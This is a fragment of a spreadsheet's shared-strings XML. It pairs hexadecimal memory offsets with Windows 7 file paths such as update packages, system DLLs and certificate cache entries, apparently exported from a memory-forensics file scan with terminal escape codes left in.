    <t>\Windows\servicing\Packages\Package_2_for_KB3030377~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a2918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a29d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3035132~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a2db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3004361~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3035126~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a33c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explor</t>
  </si>
  <si>
    <t>er Browser.ln</t>
  </si>
  <si>
    <t>k_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3748</t>
  </si>
  <si>
    <t>0xde9a3868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3020370~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3b98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\p2pcollab.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3045685~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a3f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_166_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a4038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_57_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a4298</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\colorui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a43b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_29_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a4868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3055642~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a4c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a5128</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a5490</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mchgr.inf_x86_neutral_185970e67258389c\mchgr.inf_x001B_</t>
  </si>
  <si>
    <t>0xde9a57b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3059317~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a5b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3054476~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a5e30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3078601~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a5f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_55_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6038</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\ResCache.hit_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6260</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6590</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_bitlockerdiscoveryvolumecontents_4ba1a520585d23cf.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6648</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6978</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3084135~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6af8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_70_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6d68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\usbui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a6e20</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_413_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a71d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_70_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a7498</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3078667~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a75b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a79a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3046017~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a7cd0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3092627~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a7d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_168_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a81a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a85a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a89b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a8db8</t>
  </si>
  <si>
    <t>0xde9a9290</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_168_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a95f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3076895~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a9810</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_RollupFix~31bf3856ad364e35~x86~~7601.24356.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a98c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a9c18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dmdskres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a9cd0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aa300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_419_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aa6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_418_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aaad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_417_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aaeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_416_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ab298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_423_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ab748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_422_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9abb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_421_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9abe60</t>
  </si>
  <si>
    <t>0xde9abf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_420_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ac298</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57</t>
  </si>
  <si>
    <t>0FB14ABC805C4</t>
  </si>
  <si>
    <t>6708F32F92F</t>
  </si>
  <si>
    <t>10C3B4</t>
  </si>
  <si>
    <t>0xde9ac5c8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B</t>
  </si>
  <si>
    <t>2238AACCEDC3F</t>
  </si>
  <si>
    <t>1FFE8E7EB5F</t>
  </si>
  <si>
    <t>575EC9</t>
  </si>
  <si>
    <t>0xde9ac680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_841_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aca68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_840_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9acd98</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dl</t>
  </si>
  <si>
    <t>0xde9ace50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_424_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ad2e0</t>
  </si>
  <si>
    <t>0xde9ad398</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3177467~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ad790</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94</t>
  </si>
  <si>
    <t>308059B57B314</t>
  </si>
  <si>
    <t>2E455B38A6E</t>
  </si>
  <si>
    <t>B92015</t>
  </si>
  <si>
    <t>0xde9ad848</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2952664~31bf3856ad364e35~x86~~6.1.25.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9adc30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2952664~31bf3856ad364e35~x86~~6.1.25.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ade18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2952664_SP1~31bf3856ad364e35~x86~~6.1.25.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9adf80</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D</t>
  </si>
  <si>
    <t>266D9E1E69FA1</t>
  </si>
  <si>
    <t>EEFB9699B00</t>
  </si>
  <si>
    <t>9B34C8</t>
  </si>
  <si>
    <t>_0A9BFDD75B598C2110CBF610C078E6E6_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ae2f8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A5</t>
  </si>
  <si>
    <t>83E2A51BFBDC1</t>
  </si>
  <si>
    <t>E492A57B7C8</t>
  </si>
  <si>
    <t>0xde9ae3b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Links-Package~31bf3856ad364e35~x86~en-US~6.1.760</t>
  </si>
  <si>
    <t>0xde9ae598</t>
  </si>
  <si>
    <t>0xde9ae678</t>
  </si>
  <si>
    <t>\Windows\System32\prnfldr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ae850</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4C</t>
  </si>
  <si>
    <t>7F163ED126D5C</t>
  </si>
  <si>
    <t>3CB9457F68E</t>
  </si>
  <si>
    <t>C64E9E</t>
  </si>
  <si>
    <t>0xde9aead0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aee00</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9A</t>
  </si>
  <si>
    <t>19ADAD9D098E0</t>
  </si>
  <si>
    <t>39450ABBEDD</t>
  </si>
  <si>
    <t>5616EB</t>
  </si>
  <si>
    <t>_451B4A2D71A730832E8F191CC2D337DF_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aeeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9af3c8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\43</t>
  </si>
  <si>
    <t>507F87C1453B2</t>
  </si>
  <si>
    <t>187C030286C</t>
  </si>
  <si>
    <t>2D44AB</t>
  </si>
  <si>
    <t>0xde9af7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteDesktopClient-WinIP-Package~31bf3856ad364e</t>
  </si>
  <si>
    <t>35~x86~~7.1.7</t>
  </si>
  <si>
    <t>601.16398.m</t>
  </si>
  <si>
    <t>0xde9afae0</t>
  </si>
  <si>
    <t>0xde9afb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Printer-Drivers-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xde9afec8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\apds.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9aff80</t>
  </si>
  <si>
    <t>0xde9b0460</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wdmaudio.inf_x86_neutral_cb5a5ee8949608a3\wdmaudi</t>
  </si>
  <si>
    <t>0xde9b0518</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RemoteDesktopClient-BlueIP-Package~31bf3856ad364</t>
  </si>
  <si>
    <t>e35~x86~en-US</t>
  </si>
  <si>
    <t>~7.2.7601.1</t>
  </si>
  <si>
    <t>6415.m</t>
  </si>
  <si>
    <t>0xde9b0700</t>
  </si>
  <si>
    <t>e35~x86~~7.2.</t>
  </si>
  <si>
    <t>7601.16415.</t>
  </si>
  <si>
    <t>0xde9b0920</t>
  </si>
  <si>
    <t>\Windows\System32\appraiser.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b0b40</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\acpi.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b0d60</t>
  </si>
  <si>
    <t>\Windows\System32\PerfStringBackup.INI_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b0ec8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE</t>
  </si>
  <si>
    <t>7FFD2FD84D3B3</t>
  </si>
  <si>
    <t>2FD43DC8F57</t>
  </si>
  <si>
    <t>5A9F28</t>
  </si>
  <si>
    <t>0xde9b0f80</t>
  </si>
  <si>
    <t>4E65B61F9D3E2</t>
  </si>
  <si>
    <t>BD9941E4DFA</t>
  </si>
  <si>
    <t>4ED4BB</t>
  </si>
  <si>
    <t>0xde9b1038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2923545~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b1300</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00x.inf_x86_neutral_4c73c1f7a0f2d2cb\prnlx00</t>
  </si>
  <si>
    <t>0xde9b13b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_44_for_KB2923545~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b17a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2923545~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b1b98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\drt.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b1c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2923545_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b23a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3075226_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b27b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3075226~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b2b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB2923545~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b2f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_21_for_KB2923545~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b32c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3020388_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b3610</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\telephon.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b36c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3020388~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b3b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3075226~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b3f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3075226~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b4258</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2621440~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b4660</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b4a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3020388~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b4d98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rasapi32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b4e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3020388~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b55f0</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\31</t>
  </si>
  <si>
    <t>30B1871A12652</t>
  </si>
  <si>
    <t>0A8C47861EF</t>
  </si>
  <si>
    <t>E3ED4D</t>
  </si>
  <si>
    <t>0xde9b56a8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\26</t>
  </si>
  <si>
    <t>969811E3D01AC</t>
  </si>
  <si>
    <t>44AB6260178</t>
  </si>
  <si>
    <t>3F7AE6</t>
  </si>
  <si>
    <t>0xde9b5a48</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\mssmbios.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b5d98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\deskperf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b5e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2685939~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b6038</t>
  </si>
  <si>
    <t>\Windows\System32\perfh009.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b62a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\vds.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b6488</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scecli.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b6750</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pnrpsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b6870</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiwmp\a3a4a94b67a960cf20f1_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b69f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\audiodev.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b6b18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc0.inf_x86_neutral_c24bcc939e6dfc23\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde9b6f80</t>
  </si>
  <si>
    <t>\Windows\inf\WmiApRpl\0009\WmiApRpl.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b7038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_en-us_da440b72296cc45e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b7448</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.En</t>
  </si>
  <si>
    <t>0xde9b7520</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc_x001B_[</t>
  </si>
  <si>
    <t>0xde9b8ae8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiwmp\6.1.0.0__31bf3856ad364e35\ehiwmp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9b8ba0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\AuditPolicyGPManagedStubs.Interop\6.1.0.0__31bf3856ad364e35\AuditPoli</t>
  </si>
  <si>
    <t>cyGPManagedSt</t>
  </si>
  <si>
    <t>ubs.Interop</t>
  </si>
  <si>
    <t>0xde9b8c58</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B2</t>
  </si>
  <si>
    <t>238AACCEDC3F1</t>
  </si>
  <si>
    <t>FFE8E7EB5F5</t>
  </si>
  <si>
    <t>75EC9_x001B_</t>
  </si>
  <si>
    <t>0xde9bab20</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe_x001B_[0K_x001B_[140G</t>
  </si>
  <si>
    <t>0xde9bada0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehRecObj\95c395ea2ec44c1fa141_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9baf80</t>
  </si>
  <si>
    <t>0xde9bb188</t>
  </si>
  <si>
    <t>0xde9bb268</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\f</t>
  </si>
  <si>
    <t>eatured_chann</t>
  </si>
  <si>
    <t>el[1].png_x001B_[</t>
  </si>
  <si>
    <t>0xde9bbcc8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\umpnpmgr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bc038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ppcsnap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bc128</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wscript.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bc310</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\comres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bc4f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmoto1.inf_x86_neutral_abac121bbd78f10a\mdmmoto</t>
  </si>
  <si>
    <t>0xde9bd4a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\appinfo.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bd778</t>
  </si>
  <si>
    <t>\Windows\System32\msscntrs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9be480</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F5F320A94D4D2B4465D8F17E2B</t>
  </si>
  <si>
    <t>B2D351_D7867D</t>
  </si>
  <si>
    <t>EAB1E5B055F</t>
  </si>
  <si>
    <t>9518CF</t>
  </si>
  <si>
    <t>0270C1587_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bed50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fveui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bf130</t>
  </si>
  <si>
    <t>\Windows\System32\msdmo.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9bf540</t>
  </si>
  <si>
    <t>0xde9bf9f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\U</t>
  </si>
  <si>
    <t>IAutomationPr</t>
  </si>
  <si>
    <t>ovider.dll_x001B_</t>
  </si>
  <si>
    <t>0xde9bfd00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_redistlist_2e6ab8b35e9ef953.cdf</t>
  </si>
  <si>
    <t>0xde9c0038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_addins_2452dff8cb692cdd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c0240</t>
  </si>
  <si>
    <t>\Windows\System32\rdpdd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c19d0</t>
  </si>
  <si>
